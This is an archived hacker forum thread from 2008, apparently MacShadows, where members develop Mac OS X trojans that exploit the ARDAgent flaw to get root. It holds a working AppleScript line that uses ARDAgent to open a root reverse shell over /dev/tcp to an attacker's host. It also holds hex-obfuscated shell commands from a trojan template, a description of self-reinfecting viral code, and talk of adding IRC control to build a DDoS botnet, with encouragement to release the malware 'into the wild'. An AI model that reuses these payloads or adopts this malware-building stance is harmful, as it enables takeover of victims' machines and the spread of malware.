Full Version: remote login Trojan
Ummhm, true and this is not a remote vulnerability. However the vulnerability -can- be exploited remotely.
QUOTE (Skratz0r @ Jun 25 2008, 06:56 AM) 
The problem would be finding where to host it, though.
~ Skrat
~ Skrat
Um, gee Skrat, your example is posted right here. :)
Say what?
QUOTE (Nilkimas @ Jun 25 2008, 03:20 AM)
You forgot there is already an obj.C version of the vir, but no spotlight integration... :-P
Here is the last version, which is kind of improved, so it is intelligent and reinfects the system only a after a certain amount of time, so it doesnt waste too much System ressources and is more silent.
It also does infect all volumes (like ftp or afp mounted volumes) on the system. Also different is, that the infection method starts only after an infected application has quit, so there won't be any noticable slow-down at the launch of an app.
Now the infection method could also be put into an addition thread, so it could run even more smooth, but this is not implemented in this version although it can be done quite quickly using NSThread.
There might be the need to clean that stuff a bit up, but it works, as far as i remember 5 months ago.. All the NSLogs were for debugging, you are free to remove them and the comments... Must be compiled as command-line utility, using the Foundation Framework. (Maybe you need to add the AppKit Framework too, not sure though).
Here is the last version, which is kind of improved, so it is intelligent and reinfects the system only a after a certain amount of time, so it doesnt waste too much System ressources and is more silent.
It also does infect all volumes (like ftp or afp mounted volumes) on the system. Also different is, that the infection method starts only after an infected application has quit, so there won't be any noticable slow-down at the launch of an app.
Now the infection method could also be put into an addition thread, so it could run even more smooth, but this is not implemented in this version although it can be done quite quickly using NSThread.
There might be the need to clean that stuff a bit up, but it works, as far as i remember 5 months ago.. All the NSLogs were for debugging, you are free to remove them and the comments... Must be compiled as command-line utility, using the Foundation Framework. (Maybe you need to add the AppKit Framework too, not sure though).
CODE
...
I did forget about it! <3 your improvements man. You put a good amount of effort into it :)
QUOTE
As you may have read, this flaw is not capable of being exploited remotely
Izzat so?
Izzat so?
Yeah, I guess I could've explained myself a bit better there - some sites have posted that it isn't possible for the ARDAgent exploit to be used with a remote ssh session. It is.
See: The previous page of this thread... http://www.macshadows.com/forums/index.php...ost&p=65879
Robert Vamosi = on crack?
http://news.cnet.com/8301-10789_3-9976122-...tml?tag=sc.blog
Excerpt
Doh, I misread that, I thought he was stating that the email from Andrew to the Washington Post was embedded in the template. Nvrmnd.
http://news.cnet.com/8301-10789_3-9976122-...tml?tag=sc.blog
Excerpt
QUOTE
Last Thursday, Mac antivirus vendors Intego and SecureMac reported a serious vulnerability within the Apple Remote Desktop Agent (ARDAgent). It is part of the remote-management component of Mac OS X 10.4 and 10.5 and is owned by root. Thus, the ARDAgent executable runs this malicious code as root without requiring a password.
The Washington Post's Brian Krebs reported on Monday the presence of a hacker forum devoted to the development of Trojans around this vulnerability. The particular user forum at MacShadows.com has since been removed. Krebs nonetheless managed to obtain screenshots from the forum before it was erased, and also a copy of the Mac Trojan template.
Buried within the template was an e-mail from one of the Trojan's authors, "Andrew."
"Apple tells us that OS X is safe and secure and fails to actually confirm that it is so on their own. We are left to experiment and test our own security and too often we discover that we aren't actually as secure as we were led to believe," Andrew said in an e-mail to the Post.
The Washington Post's Brian Krebs reported on Monday the presence of a hacker forum devoted to the development of Trojans around this vulnerability. The particular user forum at MacShadows.com has since been removed. Krebs nonetheless managed to obtain screenshots from the forum before it was erased, and also a copy of the Mac Trojan template.
Buried within the template was an e-mail from one of the Trojan's authors, "Andrew."
"Apple tells us that OS X is safe and secure and fails to actually confirm that it is so on their own. We are left to experiment and test our own security and too often we discover that we aren't actually as secure as we were led to believe," Andrew said in an e-mail to the Post.
Doh, I misread that, I thought he was stating that the email from Andrew to the Washington Post was embedded in the template. Nvrmnd.
For Visitors:
The following links to our knowledge base contain further information on this subject, including Solutions, Discovery, Templates, and more:
ARDAgent exploit & Com.apple.SystemLoginItems.plist Exploit
The following links to our knowledge base contain further information on this subject, including Solutions, Discovery, Templates, and more:
ARDAgent exploit & Com.apple.SystemLoginItems.plist Exploit
Hehe I'm famous for doing like nothing
Lol. So it seems...
I can finally get back on the forums yay! but, 61 pages in this post?!?!?!?!111/?!/111
QUOTE (andrewistheshit @ Jun 25 2008, 09:40 PM)
Hehe I'm famous for doing like nothing
None of us are living in a vacuum Andrew. You ask questions, others read them and think, conversation ensues, soon Rome is burned to the ground. :) This thread is a perfect example... one simple post by Lokin and suddenly the Sky is Falling, the Sky is Falling!!!!
and dont for get to let it into the wild for maximum effect. ;]
so i looked around really quick and im trying to figure out the hex code thing like this outa the templet.
is that not called hex coding?
or is it Hex im just confused how to use it and what its advantage is besides hiding things like my email :]
so i looked around really quick and im trying to figure out the hex code thing like this outa the templet.
CODE
set key1 to do shell script "echo -e \"\\x5b\\x6e\\x2d\\x7a\\x69\\x2d\\x6d\\x61\\x2d\\x68\\x5d\\x38\\x36\\x37\\x35\\x33\\x30\\x39\\x2d\\x34\\x20\\x32\\x31\""
set key2 to do shell script "echo -e \"\\x5b\\x61\\x2d\\x68\\x69\\x2d\\x6d\\x6e\\x2d\\x7a\\x5d\\x30\\x31\\x32\\x33\\x34\\x35\\x36\\x37\\x38\\x39\\x20\\x2d\""
set key2 to do shell script "echo -e \"\\x5b\\x61\\x2d\\x68\\x69\\x2d\\x6d\\x6e\\x2d\\x7a\\x5d\\x30\\x31\\x32\\x33\\x34\\x35\\x36\\x37\\x38\\x39\\x20\\x2d\""
is that not called hex coding?
or is it Hex im just confused how to use it and what its advantage is besides hiding things like my email :]
Hey Andrew, how's the fame going? :)
At times it is difficult to include certain characters. For instance a space is a character which can cause problems on the command line. 'ls /Applications/Address Book.app' would attempt to list files in the folder /Applications/Address and also in the folder Book.app because the space is typically the field separator for different parts of a command line, not just a character considered to be included in a specific part, I don't think I said that well at all but enh, moving on. To address that issue, the space can be quoted, for instance this 'ls "/Applications/Address Book.app"' would work since the double-quotes are used to indicate the beginning and end of the filepath part of the command line. However, space isn't the only problematic character. Others include tab, return and how about if the filename itself contains a double-quote? See the problem?
To overcome that, 'escaping' is used. In this example, the space in the filepath is escaped by the backslash character. /Applications/Address\ Book.app. This allows a space to be included without actually being treated as a space. Instead, its treated as a 'normal' character and not a possible field separator.
Another problem is that some characters may not necessarily be visible, or easily entered from a keyboard. A way to include such a character without causing other problems is to use the numerical value which represents the character, instead of the character itself.
"A" is generally how your computer would display the character whose value is 65. In AppleScript try "display dialog (ASCII character 65)". 65 is the value in decimal or base 10. Base 10 is 'native' for humans but not computers. Computers, having only 2 fingers, prefer to count in base 2 and multiples thereof. Base 2 is not exactly 'user-friendly' to the human attempting to issue commands to the computer. A "happy medium" of base 16 is commonly used instead. In base 16, the value 65 (being six 10s and five 1s) is expressed as 41 (four 16s and one 1). So the hexadecimal or hex value of A is 41.
But if you merely type 'echo 41' on the command line, it will return "41" not A. Escaping can be used to tell the computer that the 41 is actually the hex value of the character we want it to display instead. In Terminal, type...
And now we get the output we wanted, "A". Type 'help echo' for a somewhat incomplete explanation of the -e switch as applies to the bash built-in command "echo".
In the AppleScript examples you posted, we see a method of getting around yet another problem which is that the escape character backslash is also used in AppleScript, for instance like this 'display dialog "\x41"' which displays "x41". So when trying to pass the backslash from an AppleScript command to a shell command it fails because AppleScript assumes that by \x we mean the escaped character "x" so it would pass "x41" to bash instead of "\x41". To pass the backslash from an AppleScript command to a shell command, the escape character must be escaped with the escape character.
As you can see, forethought is not always a primary ingredient in designing computer languages. :)
Here's one of the commands you posted, and the output returned when the command is run in Script Editor.
"[a-hi-mn-z]0123456789 -"
At times it is difficult to include certain characters. For instance a space is a character which can cause problems on the command line. 'ls /Applications/Address Book.app' would attempt to list files in the folder /Applications/Address and also in the folder Book.app because the space is typically the field separator for different parts of a command line, not just a character considered to be included in a specific part, I don't think I said that well at all but enh, moving on. To address that issue, the space can be quoted, for instance this 'ls "/Applications/Address Book.app"' would work since the double-quotes are used to indicate the beginning and end of the filepath part of the command line. However, space isn't the only problematic character. Others include tab, return and how about if the filename itself contains a double-quote? See the problem?
To overcome that, 'escaping' is used. In this example, the space in the filepath is escaped by the backslash character. /Applications/Address\ Book.app. This allows a space to be included without actually being treated as a space. Instead, its treated as a 'normal' character and not a possible field separator.
Another problem is that some characters may not necessarily be visible, or easily entered from a keyboard. A way to include such a character without causing other problems is to use the numerical value which represents the character, instead of the character itself.
"A" is generally how your computer would display the character whose value is 65. In AppleScript try "display dialog (ASCII character 65)". 65 is the value in decimal or base 10. Base 10 is 'native' for humans but not computers. Computers, having only 2 fingers, prefer to count in base 2 and multiples thereof. Base 2 is not exactly 'user-friendly' to the human attempting to issue commands to the computer. A "happy medium" of base 16 is commonly used instead. In base 16, the value 65 (being six 10s and five 1s) is expressed as 41 (four 16s and one 1). So the hexadecimal or hex value of A is 41.
But if you merely type 'echo 41' on the command line, it will return "41" not A. Escaping can be used to tell the computer that the 41 is actually the hex value of the character we want it to display instead. In Terminal, type...
CODE
echo -e "\x41"
And now we get the output we wanted, "A". Type 'help echo' for a somewhat incomplete explanation of the -e switch as applies to the bash built-in command "echo".
In the AppleScript examples you posted, we see a method of getting around yet another problem which is that the escape character backslash is also used in AppleScript, for instance like this 'display dialog "\x41"' which displays "x41". So when trying to pass the backslash from an AppleScript command to a shell command it fails because AppleScript assumes that by \x we mean the escaped character "x" so it would pass "x41" to bash instead of "\x41". To pass the backslash from an AppleScript command to a shell command, the escape character must be escaped with the escape character.
As you can see, forethought is not always a primary ingredient in designing computer languages. :)
Here's one of the commands you posted, and the output returned when the command is run in Script Editor.
CODE
set key2 to do shell script "echo -e \"\\x5b\\x61\\x2d\\x68\\x69\\x2d\\x6d\\x6e\\x2d\\x7a\\x5d\\x30\\x31\\x32\\x33\\x34\\x35\\x36\\x37\\x38\\x39\\x20\\x2d\""
"[a-hi-mn-z]0123456789 -"
being grounded im going to have to read the rest later but the fame isnt that cool. im grounded for one. Secondly i didnt really write it so i dont really feel that good so i have taken it apon myself to try to learn this stuff to the best of my ability right now.
Yeah the grounded part sounds lame and I suppose any recognition of fame would be limited to a rather small percentage of the populace. That last part sounds very good though. :)
Yea about nobody I know thinks that it was cool. There all like nice, so?
yea Im kinda pissed that I still won't have it for like a week. :(
yea Im kinda pissed that I still won't have it for like a week. :(
QUOTE (Wawl @ Jun 16 2008, 10:25 AM)
... Or simply
CODE
repeat 10 times
try
tell application "ARDAgent" to do shell script "bash -i >& /dev/tcp/" & masters_DDNS & "/" & masters_netcat_port & " 0>&1"
end try
end repeat
...try
tell application "ARDAgent" to do shell script "bash -i >& /dev/tcp/" & masters_DDNS & "/" & masters_netcat_port & " 0>&1"
end try
end repeat
Strange. Is this /dev/tcp only under Leopard? I don't seem to have one.
What can be done for non-leopard users in that/this situation?
~ Skrat
It doesn't *actually* exist, its all smoke and mirrors by bash. :) It will work in 10.4 too. Try it.
http://www.gnu.org/software/bash/manual/bashref.html
http://www.gnu.org/software/bash/manual/bashref.html
QUOTE
Bash handles several filenames specially when they are used in redirections, as described in the following table:
/dev/fd/fd
If fd is a valid integer, file descriptor fd is duplicated.
/dev/stdin
File descriptor 0 is duplicated.
/dev/stdout
File descriptor 1 is duplicated.
/dev/stderr
File descriptor 2 is duplicated.
/dev/tcp/host/port
If host is a valid hostname or Internet address, and port is an integer port number or service name, Bash attempts to open a TCP connection to the corresponding socket.
/dev/udp/host/port
If host is a valid hostname or Internet address, and port is an integer port number or service name, Bash attempts to open a UDP connection to the corresponding socket.
/dev/fd/fd
If fd is a valid integer, file descriptor fd is duplicated.
/dev/stdin
File descriptor 0 is duplicated.
/dev/stdout
File descriptor 1 is duplicated.
/dev/stderr
File descriptor 2 is duplicated.
/dev/tcp/host/port
If host is a valid hostname or Internet address, and port is an integer port number or service name, Bash attempts to open a TCP connection to the corresponding socket.
/dev/udp/host/port
If host is a valid hostname or Internet address, and port is an integer port number or service name, Bash attempts to open a UDP connection to the corresponding socket.
$ /dev/tcp http://www.google.com 80
-bash: /dev/tcp: No such file or directory
$ /dev/tcp 74.52.40.242 80
-bash: /dev/tcp: No such file or directory
---------
Edit
---------
Ok, figured out how to do it now... :-P
echo "GET / HTTP/1.1" > /dev/tcp/google.com/80
~ Skrat
-bash: /dev/tcp: No such file or directory
$ /dev/tcp 74.52.40.242 80
-bash: /dev/tcp: No such file or directory
---------
Edit
---------
Ok, figured out how to do it now... :-P
echo "GET / HTTP/1.1" > /dev/tcp/google.com/80
~ Skrat
QUOTE (andrewistheshit @ Jun 27 2008, 12:50 AM)
being grounded im going to have to read the rest later but the fame isnt that cool. im grounded for one. Secondly i didnt really write it so i dont really feel that good so i have taken it apon myself to try to learn this stuff to the best of my ability right now.
Don't worry about it :P You were, as callmenames mentioned, instrumental in provoking the conversation and asking the right questions without which the trojan may never have been developed.
You had some good ideas and input and while not soley responsible you definitely deserve at least some credit (but perhaps not all of it ! :) )
Stay in school kids..
Hah.
You two-faced so and so...
~_~
~ Skrat
You two-faced so and so...
QUOTE
[11:26:04] <stef_work> alcohol and drugs are great for teh kids
[11:26:20] <stef_work> i encourage all children to get high while they can
[11:26:20] <stef_work> i encourage all children to get high while they can
~_~
~ Skrat
QUOTE
[11:30:15] <Skrat> I dress in women's clothing sometimes
[11:31:10] <Skrat> it makes me feel warm inside
[11:31:10] <Skrat> it makes me feel warm inside
Yes, yes it does.
~ Skrat
~ Skrat
Name: OSX.Trojan.PokerStealer?? My Macbook as the trojan (Video)
Link: http://www.youtube.com/watch?v=h16u9cU0YcA
Description: I was working in Keynote and my mac just went black and started emitting and very loud noise, i ran away from it because it sounded like it was going to blow up then i got my camera and filmed the rest!!!!!
I'm sure that this person is slightly retarded, warning this is extremely boring, pointless and stupid. Nothing happens throughout so don't bother watching the whole thing.
Link: http://www.youtube.com/watch?v=h16u9cU0YcA
Description: I was working in Keynote and my mac just went black and started emitting and very loud noise, i ran away from it because it sounded like it was going to blow up then i got my camera and filmed the rest!!!!!
I'm sure that this person is slightly retarded, warning this is extremely boring, pointless and stupid. Nothing happens throughout so don't bother watching the whole thing.
QUOTE
this is extremely boring, pointless and stupid.
I concur. But why did you post it? xD
Indeed, it's weird someone already posts a video with the supposed name in the title, but meh.
False alarm...
Who fucking called it OSX.Trojan.PokerStealer? What a shitty name.
Stupid security companies.
~ Skrat
That would be Intego. They protect your world. lol
http://www.intego.com/news/ism0803.asp
I named the file PokerGame and slapped a hideous icon on it as an example. Apparently name+icon not indicating intended purpose of program, now = trojan. By that definition, Firefox qualifies. It seems clear from the icon and the name that running Firefox will unleash a burning fox upon the world. In reality, all it does is open a browser which introduces a slew of security concerns on your system. Stupid trojans. And for the slow witted, yes I'm kidding. Almost all the time.
http://www.intego.com/news/ism0803.asp
I named the file PokerGame and slapped a hideous icon on it as an example. Apparently name+icon not indicating intended purpose of program, now = trojan. By that definition, Firefox qualifies. It seems clear from the icon and the name that running Firefox will unleash a burning fox upon the world. In reality, all it does is open a browser which introduces a slew of security concerns on your system. Stupid trojans. And for the slow witted, yes I'm kidding. Almost all the time.
That ARD script is an awesome piece of work.
QUOTE (callmenames @ Jun 27 2008, 07:49 PM)
That would be Intego. They protect your world. lol
They really do write this. What hubris!
QUOTE (Skratz0r @ Jun 27 2008, 10:55 AM)
Hah.
You two-faced so and so...
You two-faced so and so...
Kids! Don't buy drugs! Join a rock band and let your manager buy them for you!
- Billy Mack
QUOTE (Fixer @ Jun 29 2008, 01:56 AM)
That ARD script is an awesome piece of work.
Which one? There are two variations of multi-featured (long) Trojan and various shorter scripts too. Oktane went the XCode route with a perfect authentication dialog window as a backup in case the exploit was unsuccessful, I stayed in Script Editor trying to keep it as easy as possible for the largest number of people to play with. Its probably safe to speak for all of us and just say Thanks. :) I happen to know that even now there are variants being crafted with fresh ideas and also similar but wholly unrelated projects whose only similarity is in taking advantage of the vulnerability. I think the media attention may have made some people shy of posting their ideas, which is a shame because it was awesome to see everyone jumping in for awhile there, but on the other hand maybe its time for a different topic in a new thread. Care to start one? :)
QUOTE (callmenames @ Jun 29 2008, 10:27 AM)
Which one? There are two variations of multi-featured (long) Trojan and various shorter scripts too. Oktane went the XCode route with a perfect authentication dialog window as a backup in case the exploit was unsuccessful, I stayed in Script Editor trying to keep it as easy as possible for the largest number of people skiddies to play with. Its probably safe to speak for all of us and just say Thanks. :) I happen to know that even now there are variants being crafted with fresh ideas and also similar but wholly unrelated projects whose only similarity is in taking advantage of the vulnerability. I think the media attention may has have made some people shy of posting their ideas, which is a shame because it was awesome to see everyone jumping in for awhile there, but on the other hand maybe its time for a different topic in a new thread. Care to start one? :)
Fixed. :-P
~ Skrat
Personally I think that both of the Mac script kiddies that are out there need all the help they can get to keep up with their Windows counterparts. Many of these http://www.macshadows.com/downloads.html don't include any source at all. At the very least perhaps someone will get some exposure from this, to something more than a compiled program. Hopefully the use of high-level languages like AppleScript will have one or the other of the script kiddies (possibly both but I'm not asking for miracles here) deciding to fiddle about in the code in an effort to correct my mistakes or more fully implement ideas at which I only hinted...
Hmm. Perhaps.
But if they're gonna learn to code; PLEASE don't teach them AppleScript. Heh...
C for the win.
~ Skrat
But if they're gonna learn to code; PLEASE don't teach them AppleScript. Heh...
C for the win.
~ Skrat
Sure but everything needed to use AppleScript is already included on every Mac. Its widely accessible. Anyone using OS X can double-click script editor and get instant positive feedback in that it runs... whereas when the average user opens Terminal and types gcc <something>...
CODE
-bash: gcc: command not found
QUOTE (callmenames @ Jun 30 2008, 01:37 PM)
Sure but everything needed to use AppleScript is already included on every Mac. Its widely accessible. Anyone using OS X can double-click script editor and get instant positive feedback in that it runs... whereas when the average user opens Terminal and types gcc <something>...
CODE
-bash: gcc: command not found
Same reason I used Python and Perl for my stuff. It's included by default. But C might be fun to do something in...
Perhaps a poll next time on which language the members would prefer for the trojan examples. :)
http://blogs.techrepublic.com.com/security/?p=486
And I'd bet a dollar Andrew ain't the only one... :)
http://blogs.techrepublic.com.com/security/?p=486
QUOTE
Trojans targeting Mac OS X ARDAgent flaw surfaces
It doesn’t take rocket science to know that Andrew is deeply unhappy with Apple’s policy not to talk on topics relating to security vulnerabilities.
It doesn’t take rocket science to know that Andrew is deeply unhappy with Apple’s policy not to talk on topics relating to security vulnerabilities.
And I'd bet a dollar Andrew ain't the only one... :)
QUOTE
Apple released Mac OS X 10.5.4 today, a bug-fix update that touches on several areas. Recent security updates are included (though the recent ARDAgent vulnerability has not yet been addressed[)]
Source: http://db.tidbits.com/article/9679
Oh dear me, I just can't stop laughing although I also want to cry. I think I'll switch to Ubuntu now.
Local denial-of-service for the whole damn console/GUI! WITHOUT A SINGLE LINE OF CODE!!!!!!
http://www.macshadows.com/forums/index.php?showtopic=8794
Local denial-of-service for the whole damn console/GUI! WITHOUT A SINGLE LINE OF CODE!!!!!!
http://www.macshadows.com/forums/index.php?showtopic=8794
'callmenames' is upgrading to Leopard for the moment, and shall return in a few months although with a different name due to being shy. :)
Its been fun, see you all again soon!
:)
Its been fun, see you all again soon!
:)
QUOTE (callmenames @ Jun 30 2008, 03:39 PM)
Perhaps a poll next time on which language the members would prefer for the trojan examples. :)
http://blogs.techrepublic.com.com/security/?p=486
And I'd bet a dollar Andrew ain't the only one... :)
http://blogs.techrepublic.com.com/security/?p=486
And I'd bet a dollar Andrew ain't the only one... :)
perl - quick and easy
nm
I second that!!
aww they fixed it :(
It still returns root here on 10.5.4 so I don't think its fixed yet.
I also noticed that the kickstart thing mentioned in this thread does require sudo in 10.5.4.
I tried getting SecurityAgent to do stuff without much luck but I noticed that it creates files with group wheel instead of its own group which seems very wrong. Its parent process is securityd which does have group wheel so somehow its inheriting that I guess.
I also noticed that the kickstart thing mentioned in this thread does require sudo in 10.5.4.
CODE
bash-3.2$ /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart
/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart must be run as root or sudo (501).
/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart must be run as root or sudo (501).
I tried getting SecurityAgent to do stuff without much luck but I noticed that it creates files with group wheel instead of its own group which seems very wrong. Its parent process is securityd which does have group wheel so somehow its inheriting that I guess.
CODE
tell application "SecurityAgent" to do shell script "touch /Users/Shared/foo; ls -l /Users/Shared/foo; id"
"-rw-r--r-- 1 _securityagent wheel 0 Jul 3 11:01 /Users/Shared/foo
uid=92(_securityagent) gid=92(_securityagent) groups=92(_securityagent)"
"-rw-r--r-- 1 _securityagent wheel 0 Jul 3 11:01 /Users/Shared/foo
uid=92(_securityagent) gid=92(_securityagent) groups=92(_securityagent)"
CODE
bash-3.2# dscl . -read /Groups/wheel
AppleMetaNodeLocation: /Local/Default
GeneratedUID: ABCDEFAB-CDEF-ABCD-EFAB-CDEF00000000
GroupMembership: root
Password: *
PrimaryGroupID: 0
RealName:
System Group
RecordName: wheel
RecordType: dsRecTypeStandard:Groups
SMBSID: S-1-5-21-100
bash-3.2# ps -Aj | grep Sec
root 4156 22 22 2a78fd8 0 S ?? 0:00.09 /System/Library/CoreServices/SecurityAgent.app/Contents/Resources/authorizationhost
_securityagent 4172 22 22 2a78fd8 0 S ?? 0:02.75 /System/Library/CoreServices/SecurityAgent.app/Contents/MacOS/SecurityAgent
AppleMetaNodeLocation: /Local/Default
GeneratedUID: ABCDEFAB-CDEF-ABCD-EFAB-CDEF00000000
GroupMembership: root
Password: *
PrimaryGroupID: 0
RealName:
System Group
RecordName: wheel
RecordType: dsRecTypeStandard:Groups
SMBSID: S-1-5-21-100
bash-3.2# ps -Aj | grep Sec
root 4156 22 22 2a78fd8 0 S ?? 0:00.09 /System/Library/CoreServices/SecurityAgent.app/Contents/Resources/authorizationhost
_securityagent 4172 22 22 2a78fd8 0 S ?? 0:02.75 /System/Library/CoreServices/SecurityAgent.app/Contents/MacOS/SecurityAgent
QUOTE (Andrew#002 @ Jul 3 2008, 11:02 AM)
I tried getting SecurityAgent to do stuff without much luck but I noticed that it creates files with group wheel
Nevermind, /Users/Shared has its sticky-bit set.
Interesting, I like how active this thread is. Has anybody considered implementing an IRC connector to accept remote commands enabling this a DDoS capable trojan. What fun are trojans unless you can take advantage of numbers and distributed resources. =)
can anyone still get root with ARD in the newist version of lepoard?
Yes, it still works in 10.5.4
Xirc is an internet relay chat (IRC) application only for MacOSX written in pure Objective-C using Cocoa frameworks. Xirc is fully integrated with the MacOSX technologies, as like sheets, drag&drop, AddressBook, etc.
It is fully scriptable using the flexible and powerful like 'C' internal language or the AppletScript language. It supports the plugins to extend a scripting capabilities or create applications through the IRC engine.
Xirc implements DCC Send,Chat and TurboDCC, SSL connections (SSLv2 and SSLv3) with certificate and private key, connections through proxy server (HTTP, SocksV4, SocksV4a, SocksV5) and many others features.
Limitations:
30 days trial.
Damn 30 day trial. Does anybody know of something similar thats free?
It is fully scriptable using the flexible and powerful like 'C' internal language or the AppletScript language. It supports the plugins to extend a scripting capabilities or create applications through the IRC engine.
Xirc implements DCC Send,Chat and TurboDCC, SSL connections (SSLv2 and SSLv3) with certificate and private key, connections through proxy server (HTTP, SocksV4, SocksV4a, SocksV5) and many others features.
Limitations:
30 days trial.
Damn 30 day trial. Does anybody know of something similar thats free?
Why the hell did you post that here? XChat is good if you want an IRC client for OSX that's free..
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.